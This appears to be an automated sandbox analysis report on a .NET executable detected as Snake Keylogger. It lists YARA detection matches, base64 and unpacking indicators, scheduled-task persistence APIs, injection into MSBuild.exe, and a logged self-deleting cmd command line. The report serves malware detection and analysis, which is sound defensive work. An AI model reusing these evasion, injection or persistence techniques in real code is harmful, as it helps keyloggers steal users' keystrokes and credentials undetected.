Source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: MSBuild.exe PID: 2128, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 2128, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: Pnihosiyvr.exe, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: sssssssssssssssss.exe.0.dr, -.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: Pnihosiyvr.exe, -.cs	Base64 encoded string: 'zQERSeAlsCoHW+kt/QwLUutm3wsRWOgq8gFZeuA82xYWT/wJ7QsHUOck50MFWPEX2A0OUcsp8x1ZUvUX1xYHTPAp8hEWRL4v+ww9ceAm+QwKBsIt6iwbTeAO7BcPdeQm+hQHBuIt6icsXOgtpTEMWeAw0R5Zb+Ap+isWT+wm+UMjWeFz+R0WYtUn7REWVOompR8HSdoL6woQWOs82hcPXOwmpSsHScEp6hlZDrVwp0hZfPY7+xUAUfwb+woUWPdzzREPTekt3wsRWOgq8gEnRfUk8QoHT74q/xoHUfMlpQsPUu4t6h0RSQ=='
Source: sssssssssssssssss.exe.0.dr, -.cs	Base64 encoded string: 'zQERSeAlsCoHW+kt/QwLUutm3wsRWOgq8gFZeuA82xYWT/wJ7QsHUOck50MFWPEX2A0OUcsp8x1ZUvUX1xYHTPAp8hEWRL4v+ww9ceAm+QwKBsIt6iwbTeAO7BcPdeQm+hQHBuIt6icsXOgtpTEMWeAw0R5Zb+Ap+isWT+wm+UMjWeFz+R0WYtUn7REWVOompR8HSdoL6woQWOs82hcPXOwmpSsHScEp6hlZDrVwp0hZfPY7+xUAUfwb+woUWPdzzREPTekt3wsRWOgq8gEnRfUk8QoHT74q/xoHUfMlpQsPUu4t6h0RSQ=='

Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdb
Source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdbll
Source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdb

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/10@4/4

Source: C:\Users\user\Desktop\Pnihosiyvr.exe

File created: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2128

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c7462d7f-0067-4721-b650-8c2504655a05

Jump to behavior

Source: Pnihosiyvr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Pnihosiyvr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\Pnihosiyvr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Pnihosiyvr.exe	ReversingLabs: Detection: 39%
Source: Pnihosiyvr.exe	Virustotal: Detection: 55%

Source: C:\Users\user\Desktop\Pnihosiyvr.exe

File read: C:\Users\user\Desktop\Pnihosiyvr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Pnihosiyvr.exe "C:\Users\user\Desktop\Pnihosiyvr.exe"
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2128 -s 1412
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe "C:\Users\user\AppData\Roaming\sssssssssssssssss.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe "C:\Users\user\AppData\Roaming\sssssssssssssssss.exe"
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\Pnihosiyvr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Pnihosiyvr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Pnihosiyvr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Pnihosiyvr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\MSBuild.pdb% source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdba source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: protobuf-net.pdb source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb" source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: 0C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\MSBuild.pdbE source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb[ source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: MSBuild.PDB source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indoC:\Windows\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Xml.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: pC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2332223739.000001A345430000.00000004.08000000.00040000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298AE8000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A950A000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2332223739.000001A345430000.00000004.08000000.00040000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298AE8000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A950A000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Configuration.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdbll source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: symbols\exe\MSBuild.pdb.pdb` source: MSBuild.exe, 00000003.00000002.2517354331.0000009185DF2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb! source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\amd64\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2BA4.tmp.dmp.6.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: Pnihosiyvr.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: Pnihosiyvr.exe, Program.cs	.Net Code: Main System.AppDomain.Load(byte[])
Source: sssssssssssssssss.exe.0.dr, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: sssssssssssssssss.exe.0.dr, Program.cs	.Net Code: Main System.AppDomain.Load(byte[])
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d298b4c3c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d298b4c3c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a9798318.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a98b03c0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a9810388.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a32cb00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a97c0350.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a97c0350.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a9798318.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2769148817.000001D298B45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2774836682.000001D2A9703000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2769148817.000001D298AE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
